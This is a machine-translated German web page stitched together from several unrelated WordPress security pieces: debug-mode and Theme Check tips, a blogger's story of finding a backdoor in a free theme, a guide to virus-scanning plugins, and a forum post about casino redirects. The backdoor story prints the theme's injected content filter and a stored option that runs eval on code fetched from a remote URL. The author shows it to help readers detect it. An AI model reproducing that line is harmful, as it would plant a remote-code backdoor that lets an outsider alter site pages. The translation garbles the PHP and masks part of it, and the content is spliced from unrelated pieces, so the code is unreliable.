Speisekarte
HeimatSystemdienstprogramme

So überprüfen Sie ein WordPress-Theme auf Viren. Wie entferne ich einen Virus oder bösartigen Code aus WordPress? So erkennen Sie in WordPress eingebetteten bösartigen Code

Hallo alle! Die Zeit steht nicht still und jedes Mal, wenn die nächsten neuen Funktionen im Kern erscheinen. Mussten früher die meisten nicht standardmäßigen Aufgaben zu dieser Zeit mit Hilfe zusätzlicher Programmierung umgesetzt werden, ändert sich die Situation jetzt. Es gibt einen klaren Trend zur Erweiterung der Funktionalität „out of the box“.

Wenn ich auf das Jahr 2010 zurückblicke, als ich kurz vor Entdeckungen stand und mich zum ersten Mal kennenlernte, erinnere ich mich, wie schwer es für mich war, die ersten Schritte zu gehen. Für jede elementare Aufgabe habe ich Plugins gefunden und installiert, deren Gesamtzahl mehrere Dutzend erreichen könnte! 😮 Dann hieß es umdenken und Minimalismus anstreben. Der Abschnitt „Optimierung“ spiegelt einige Aspekte meiner Arbeit wider, die ich zur Beschleunigung des Blogs geleistet habe.

Schalten Sie den WordPress-Debug-Modus ein

Die Blog-Vorlage wurde von den ersten Tagen an geändert und erhielt neue Funktionen, Stile und Klassen. Nachdem er eine kritische Masse erreicht hatte, wurde er ungeschickt - es ist sehr schwierig, die Arbeitsbedingungen aufrechtzuerhalten und Hochleistung. Auf den ersten Blick unsichtbar, gab es letztes Jahr große Veränderungen – angefangen vom neuen Layout über die Arbeit mit Thumbnails bis hin zum Micro-Markup.

Als erstes habe ich nach den Konvertierungen die Entwicklerkonsole im Browser geöffnet und auf Fehler und Warnungen geprüft. Der nächste Schritt - Debuggen von WordPress. Der Modus ist in der Konfigurationsdatei wp-config.php aktiviert, finde die Zeile darin:

define("WP_DEBUG" , false );

und ersetze false durch true . Die Zeile sollte so aussehen:

define("WP_DEBUG" , true );

Wenn Fehler auftreten, wird an der Stelle, an der sie aufgetreten sind, eine Meldung angezeigt, in der das Problem und die betroffenen Dateien beschrieben werden. Dies können Syntaxanalysefehler oder veraltete Funktionen sein, die aus dem Kern entfernt oder durch neue ersetzt wurden.

Die Warnung basiert auf einer einfachen Tatsache: Die Fehlermeldung enthält absoluter Pfad in eine Datei relativ zum Stammverzeichnis des Servers. Die Nachricht ist nicht nur für den Administrator, sondern für alle Benutzer sichtbar. Ein anschauliches Beispiel:

Analysefehler: Syntaxfehler, unerwartetes 'endif' (T_ENDIF) in /u57109403/data/www/site.ru/wp-content/themes/default/index.php in Zeile 23

Wie Sie dem Beispiel entnehmen können, kann der Wert u57109403 ein Login für den Zugriff auf den Server sein und Angreifer können das Passwort nur erraten. Sei vorsichtig.

Theme Check – Testtool für WordPress-Themes

Neben der eingebauten WP_DEBUG-Funktion gibt es noch gutes Werkzeug Entwickler, der entwickelt wurde, um das Thema anhand moderner Codex-Standards zu testen.

Es ist als Theme Check-Plugin implementiert, das Sie von der offiziellen Repository-Seite herunterladen können.

Nachdem Sie das Plugin aktiviert haben, gehen Sie zu seiner Seite ( Aussehen— Themencheck). Wenn der Debug-Modus deaktiviert ist, wird eine Meldung angezeigt:

WARNUNG WP_DEBUG ist nicht aktiviert! Bitte testen Sie Ihr Design mit aktiviertem Debugging, bevor Sie es hochladen!

Wie man diesen Modus aktiviert, habe ich im ersten Teil des Artikels beschrieben. Dies ist nicht notwendig, aber für die Vollständigkeit der Analyse sehr wünschenswert. Um die Prüfung zu starten, klicken Sie auf „Prüfen“.

Wenn Sie Kyrillisch im Quellcode Ihrer Themendateien verwenden, dann seien Sie darauf vorbereitet, Informationen dieser Art im Bericht zu sehen:

INFO: In der Datei single.php wurden nicht druckbare Zeichen gefunden. Sie können diese Datei auf Fehler überprüfen.

Sie können die Anzeige solcher Meldungen deaktivieren, indem Sie das Kontrollkästchen neben "INFO unterdrücken" aktivieren. Ein Hinweis für die Zukunft: Verwenden Sie bei der Lokalisierung eines Themas die speziellen Übersetzungsdateien ru_RU.po und ru_RU.mo, anstatt sie zu bearbeiten Quelle, wobei englische Wörter durch russische ersetzt werden.

Theme-Check-Plugin wird für WordPress-Theme-Entwickler und Site-Administratoren nützlich sein. Der Bericht basiert auf der Überprüfung eines Standardsatzes Mindestanforderungen im aktuellen Thema und enthält die folgenden Symbole:

  • Erforderlich - fehlt benötigte Funktion, Klasse oder Beschreibung;
  • Warnung - Warnungen, zum Beispiel über das Vorhandensein versteckter Dateien;
  • Empfohlen - Empfehlungen zur möglichen Verwendung neuer Funktionen;
  • Info - andere Informationsmeldungen.

Die meisten noch ausstehenden Anforderungen werden durch Verweise auf den Code of Functions and Options untermauert. Allerdings ist der Bericht schon recht informativ. Kleiner Ausschnitt:

Die Ergebnisse der Überprüfung sind mit einer gewissen Vorsicht zu behandeln. Sie sollten nicht unbedingt alle vom Plugin empfohlenen Funktionen nutzen – darunter werden sicherlich auch solche sein, die Sie wirklich nicht nutzen möchten.

Dank des Debug-Modus und des Theme Check-Plugins konnte ich eine Reihe von Problemen identifizieren, die durch veraltete . Einige Verbesserungen in der functions.php wurden als unnötig entfernt oder durch Standardlösungen ersetzt, die in erschienen sind letzte Version. Ich empfehle dir, deine Blogs zu lesen!

Hallo Freunde. Bist du sicher, dass es kostenlos ist? WordPress-Vorlage, die Sie für Ihre Websites und Blogs verwenden, ist wirklich sicher und enthält nicht versteckte Bedrohungen und Schadcode? Bist du dir da ganz sicher? Unbedingt?)

Sie denken, sie haben die Vorlage durchlaufen, versteckte Links daraus entfernt und fertig. Sie scannen die Site-Dateien regelmäßig mit einem Antivirenprogramm, schauen in die Yandex-Webmaster-Tools auf der Registerkarte Sicherheit und sehen erleichtert dort eine Meldung: „ Kein bösartiger Code auf der Website gefunden«.

Das dachte ich auch. Ich will dich nicht verärgern, aber...

Versteckter gefährlicher Code in kostenlosen WordPress-Themes

Dies ist der Brief, den ich letzte Woche per Post von meinem Gastgeber erhalten habe. Kürzlich haben sie eine regelmäßige Überprüfung aller Site-Dateien auf schädliche Inhalte eingeführt, und dennoch haben sie diese Inhalte in mir gefunden!

Alles begann damit, dass ich eines Tages auf meine Website ging und sie nicht starten konnte - eine missbräuchliche Inschrift über nicht gefundene Dateien mit php-Erweiterung. Nachdem ich mich ein wenig angespannt hatte, untersuchte ich den Inhalt des Ordners mit der Site auf dem Hosting und entdeckte sofort ein Problem - meine Vorlagendatei fuctions.php wurde in functions.php.malware umbenannt, was sozusagen zweideutig angedeutet wurde - ein Antivirus oder ähnliches funktionierte hier) Nachdem ich die Mail eingegeben hatte, fand ich den obigen Bericht des Hosters.

Das erste, was ich tat, war natürlich zu überprüfen angegebene Datei, studierte seinen Inhalt, scannte ihn mit verschiedenen Antivirenprogrammen, Dutzende davon online Dienste zum Prüfen auf Viren usw. - Am Ende habe ich nichts gefunden, alle behaupteten einstimmig, dass die Datei absolut sicher sei. Natürlich habe ich dem Hoster meine Zweifel geäußert und gesagt, dass Sie etwas vermasselt haben, aber für alle Fälle habe ich ihn gebeten, einen Bericht über die Entdeckung eines bösartigen Codes vorzulegen.

Und das haben sie mir gesagt

Ich ging zu Google-Informationen zu diesem Code und dachte ernsthaft darüber nach ...

So finden Sie ein Stück Schadcode in einer Vorlage

Wie sich herausstellte, ist dies ein wirklich nicht trivialer Trick, der es Interessenten ermöglicht, Daten auf Ihre Website zu übertragen und den Inhalt von Seiten ohne Ihr Wissen zu ändern! Wenn Sie eine kostenlose Vorlage verwenden, dann Ich empfehle dringend, Ihre functions.php auf den folgenden Code zu überprüfen:

add_filter('the_content', '_bloginfo', 10001);
Funktion _bloginfo($Inhalt)(
globaler $post;
if(is_single() && ( [E-Mail geschützt](get_option('blogoption'))) !== false)(
gib $co zurück;
) Sonst gib $content zurück;
}

Selbst mit meinen sehr geringen PHP-Kenntnissen ist klar, dass ein bestimmter Filter erstellt wird, der an das globale gebunden ist Post-Variable und Inhalt sind dafür verantwortlich, dass Inhalte nur auf Blog-Beitragsseiten angezeigt werden (is_single-Bedingung). Schon verdächtig, oder? Nun, lassen Sie uns nun sehen, was dies anzeigen wird angegebenen Code auf unserer Website.

Auch die interessante Blogoption, die in der Datenbank angefordert wird, sieht sehr verdächtig aus. Wir gehen zu unserer Datenbank MySQL-Daten und wir finden dort eine Tabelle namens wp_options, wenn Sie die Präfixe nicht geändert haben, sieht sie standardmäßig so aus. Und darin finden wir eine für uns interessante Zeile namens blogoption

Was für eine Schönheit! Wir sehen die folgende Option


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Diese. uns von einer bestimmten Seite (im Übrigen russisch, wohlgemerkt) Inhalte zurückgeben, die alles tragen können! Beliebig viele Links, Schadcodes, veränderter Text etc. Die Site selbst gibt beim Zugriff einen 403-Zugriffsfehler aus, was nicht überraschend ist. Natürlich habe ich auch diese Option aus der Datenbank entfernt.

Nach Angaben der Opfer wird in der Regel genau der Inhalt Ihres Artikels mit nur einer Änderung zurückgegeben - anstelle eines Punktes "." im Text wurde ein offener Link maskiert! Übrigens wird diese Option in die Datenbank geschrieben, wenn die Vorlage selbst installiert wird, und dann zerstört sich der Code, der dies tut, sicher selbst. Und ich habe zwei Jahre lang mit solchem ​​Müll gelebt, und kein einziges Antivirenprogramm oder kein einziger Dienst hat mir diese Bedrohung die ganze Zeit über offenbart. Um ehrlich zu sein, habe ich nicht bemerkt, ob diese Technik jemals bei mir funktioniert hat oder ob mein Sicherheits-Plugin diese Möglichkeit blockiert hat (oder vielleicht eines der WordPressa-Updates diese Lücke geschlossen hat), aber es ist immer noch unangenehm.

Moral vom kostenlosen Käse

Wie gefällt Ihnen die Raffinesse unserer "Übersetzer" von Vorlagen (oder denen, die sie in ihren Katalogen veröffentlichen)? Es steht dir nicht zu, Links aus der Fußzeile herauszuschneiden) Schade, dass ich mich nicht mehr erinnere, woher ich meine Vorlage heruntergeladen habe, es ist lange her, sonst hätte ich ein paar liebevolle geschrieben. Und wenn ich damals die gleiche Erfahrung gemacht hätte, die ich jetzt habe, würde ich definitiv nicht verwenden kostenlose Vorlage, oder im Extremfall nicht von unbekannten Quellen heruntergeladen hätte!

Es ist einfacher, ein offizielles Premium-Template für 15-20 Dollar auf demselben zu kaufen und in Frieden zu leben, in dem Wissen, dass es keine Lücken und verschlüsselten Links gibt, und selbst wenn es Schwachstellen gibt, werden die Entwickler definitiv ein Update veröffentlichen, in dem sie enthalten sind diese Löcher werden geschlossen. ( Übrigens hat Artem kürzlich einen Artikel veröffentlicht, in dem er nur über Premium-Vorlagen spricht und sogar Aktionscodes für brutale Rabatte für Interessierte verteilt)

Wo eine Website vorhanden ist, können Viren vorhanden sein. Diese einfache Wahrheit lässt Sie nicht entspannen und erfordert eine ständige Überwachung des "Gesundheitszustands" der Website. WordPress-Sites sind keine Ausnahme, und wenn Sie die Popularität berücksichtigen CMS-WordPress, ist es verständlich, warum Infektionen dieser Sites häufiger auftreten als Sites anderer Systeme. Es gibt viele Tools zum Antiviren-Scannen von Websites. In diesem Artikel werde ich über einen hervorragenden Virenbekämpfer für WordPress-Sites sprechen - das AntiVirus-Plugin, wie man mit dem Antivirus-Plugin einen Virus auf WordPress findet und entfernt.

Was meinen wir mit einem Virus auf der Website?

Ein Virus auf einer Website bedeutet jeder Drittanbieterprogramm, wodurch die Site gezwungen wird, nicht wie in den Systemprogrammen festgelegt zu arbeiten. Die Definition eines Virus umfasst:

  • auf der Website aufgeführt;
  • Verschlüsselte Exekutivfunktionen, die mit Plugins und Themen auf die Website gelangen;
  • Irgendein PHP-Skripte und Java-Codes, das Ausführen von Aktionen, die dem Websitebesitzer nicht bekannt sind.

Die Ergebnisse der Einwirkung von Viren auf der Website können sehr unterschiedlich sein:

  • Links zu Ressourcen von Drittanbietern;
  • Automatische Umleitung zu den Ressourcen anderer Personen;
  • Lesen von Neuerscheinungen und Vervielfältigung auf Drittquellen;
  • Unbefugte Werbung auf der Website;
  • Die Zerstörung des Site-Codes und infolgedessen der Fall der Site.

Installieren und Konfigurieren des Antivirus-Plugins

Ein ausgezeichnetes Tool zum Überprüfen einer Website auf Viren ist Antivirus-Plugin. Das Plugin hat über 90000+ Downloads, zuletzt getestet auf WordPress Version 4.6.11.

Sie können das Plugin über die Site-Konsole auf der Registerkarte Plugins→Neu hinzufügen installieren, indem Sie das Formular für die Plugin-Suche nach Namen verwenden.

Installieren des Antivirus-Plug-ins über das Admin-Panel

So entfernen Sie einen Virus auf WordPress mit dem Antivirus-Plugin

Wichtig! Vor der Arbeit mit dem Plugin .

Das Plugin funktioniert ohne Tricks. Durch Einstellungen→Antivirus oder Plugins→AntiVirus→Einstellungen Wir betreten die Seite des aktivierten Plugins.

Klicken Sie auf " Themenvorlagen scannen"Und sehen Sie sich das Ergebnis der Überprüfung an. Alle Verzeichnisse des Arbeitsthemas werden auf der Seite wiedergegeben. Grüne Farbe bedeutet das Fehlen von Viren, rote Farbe zeigt eine Infektion an.


Ausführen eines Scans mit dem AntiVirus-Plugin

Oft fragen unsere Benutzer, ob es eine Möglichkeit gibt, ihre WordPress-Seite auf potenziell gefährlichen Code zu überprüfen. Die Antwort auf diese Frage lautet: JA, JA und nochmals JA. Es gibt sowohl bezahlte als auch kostenlose Tools um Ihre WordPress-Site nach potenziell gefährlichem oder unerwünschtem Code zu scannen. Es ist immer eine gute Idee, Ihre Website regelmäßig zu überprüfen, indem Sie nach suchen Schadcode. In diesem Artikel zeigen wir Ihnen verschiedene Möglichkeiten, Ihre WordPress-Seite auf potenziell gefährlichen Code zu scannen.

Theme Authenticity Checker (TAC)

Theme Authenticity Checker ist ein kostenloses Plugin, das alle Ihre überprüft WordPress-Themes für potenziell gefährlichen oder unerwünschten Code.

Oft zielen Hacker darauf ab, Themen zu hacken, um Links in sie einzufügen, daher ist ein Plugin eine großartige Möglichkeit, nach ihnen zu suchen.

Exploit-Scanner

Exploit Scanner - ein weiterer kostenloser WordPress-Plugin, das leistungsfähiger ist als der Theme Authenticity Checker, da es Ihnen ermöglicht, alle Dateien und Datenbanken Ihrer WordPress-Installation nach bösartigem Code zu durchsuchen. Es sucht nach Signaturen, die mit bösartigem Code übereinstimmen, und erkennt sie.
Hinweis: Es kann eine gewisse Anzahl von Fehlalarmen geben, daher müssen Sie verstehen, was Sie tun, und feststellen, ob es sich wirklich um Malware handelt oder ob alles in Ordnung ist.

Sucuri

Sucuri ist einer der MEISTEN beste Scanner Sicherheit für WordPress im Allgemeinen. Sie haben eine einfache kostenloser Scanner Websites, die Ihre Ressource überprüft, um zu sehen, ob alles in Ordnung ist. Die kostenpflichtige Version ist der kostenlosen Version jedoch in Bezug auf ihre Fähigkeiten weit überlegen. Kurz gesagt, nachdem Sie Sucuri installiert haben, überwacht es Ihre Website automatisch 24 Stunden am Tag, 7 Tage die Woche auf bösartige Skripte. Es prüft die standortweiten Aktivitäten, um Sie rechtzeitig zu informieren, wenn etwas schief geht. Wenn etwas verdächtig erscheint, blockiert Sucuri die IP. Das Plugin sendet Ihnen auch eine Benachrichtigung, wenn verdächtige Aktivitäten auf der Website beginnen. Und schließlich bietet das Plugin eine Malware-Bereinigung, und dieser Dienst ist im Preis des Dienstes enthalten (unabhängig davon, ob Ihre Website groß oder klein ist).

Für unsere Projekte haben wir einen Plan für 5 Standorte gewählt, der etwa 3 US-Dollar pro Standort und Monat kostet. Es ist sinnvoll, 3 US-Dollar pro Monat zu zahlen und sich keine Sorgen um die Sicherheit der Website zu machen.

Der Service ist übrigens nicht nur für Anfänger. Große Verlage wie CNN, USAToday, PC World, TechCrunch, TheNextWeb und andere verwenden Sucuri. Diese Jungs wissen, was sie tun, und deshalb vertrauen ihnen die Leute ihre Seiten an.

Für alle Fragen und Rückmeldungen schreiben Sie bitte in die Kommentare unten.

Vergessen Sie nach Möglichkeit nicht, Ihre Lieblingseinträge nach eigenem Ermessen mit der Anzahl der Sterne zu bewerten.

    Gute Zeit, Verständnis.
    Gestern gab es ein Problem mit shopfilters.ru und seiner Subdomain aquaphor.shopfilters.ru (beide auf derselben Datenbank), nämlich einen seltsamen Schadcode. Es manifestiert sich wie folgt:
    1. Die Möglichkeit, Plugins, den Kernel usw. zu aktualisieren und zu installieren, wurde deaktiviert.
    2. Schreckliche Bremsen im Admin-Panel.
    3. Damit sind die für den Administrator sichtbaren Störungen vorbei. Nachfolgend sind die von Kundenbenutzern beobachteten Probleme aufgeführt, und zwar nur, wenn er die Website von einem Netzwerk aus besucht, aus dem der Administrator nicht stammt.
    4. Wenn Sie auf das Menü, Logo usw. eine Weiterleitung zu Casinos, Gewinnspielen etc. ist inklusive.

    Welche Schritte wurden unternommen, bevor das Problem auftrat:
    1. Installierte Plugins: ATUM Inventory Management for WooCommerce, Woomage Store Manager WooCommerce API, Smart Store Manager For Your WooCommerce Shop, Store Manager Connector, alle von wordpress.org, haben eine Test-API-Anwendung für die Lagerüberwachung von einem PC heruntergeladen.
    2. Ein paar Tage zuvor habe ich Smart Store Manager For Your WooCommerce Shop von einer Drittanbieter-Ressource installiert, nachdem ich es mit Kaspersky und Doctorweb, der regulären Version, überprüft hatte, aber es wurde höllisch langsamer. Es wurde, wie bereits erwähnt, von wordpress.org abgebaut und installiert.

    Gestern Abend hat ein Freund ein Problem gemeldet.

    Welche Schritte wurden unternommen, nachdem das Problem aufgetreten ist:
    1. Vor kurzem alles deaktiviert installierte Plugins auf beiden Seiten - hat nicht geholfen
    2. Ich habe dasselbe mit Themen gemacht - es hat nicht geholfen
    3. Geprüft mit Diensten: http://sitecheck.sucuri.net/ :

    Website: shopfilters.ru
    Status: Mit Malware infiziert. Sofortiges Handeln ist erforderlich.
    Web Trust: Derzeit nicht auf der schwarzen Liste (10 schwarze Listen geprüft)
    Empfehlung für den Schweregrad des Scan-Ergebnisses
    Malware erkannt Kritisch LASSEN SIE IHRE WEBSITE REINIGEN
    PROBLEM ERKANNT DEFINITION INFIZIERTE URL
    http://shopfilters.ru/404javascript.js (Nutzlast anzeigen)
    Website-Malware rogueads.unwanted_ads?1 http://shopfilters.ru/dostavka/ (Payload anzeigen)
    Website-Malware rogueads.unwanted_ads?1 http://shopfilters.ru/my-account/ (Payload anzeigen)
    Website-Malware rogueads.unwanted_ads?1 http://shopfilters.ru (Payload anzeigen)
    Bekannte Javascript-Malware. Details: http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1

    Permanenter Link zum Bericht https://rescan.pro/result.php?
    Gefährlicher Code auf der Seite ✔ Keine Probleme gefunden
    Viren in Skripten ✔ Keine Probleme gefunden
    Einfügungen von gefährlichen Seiten ✖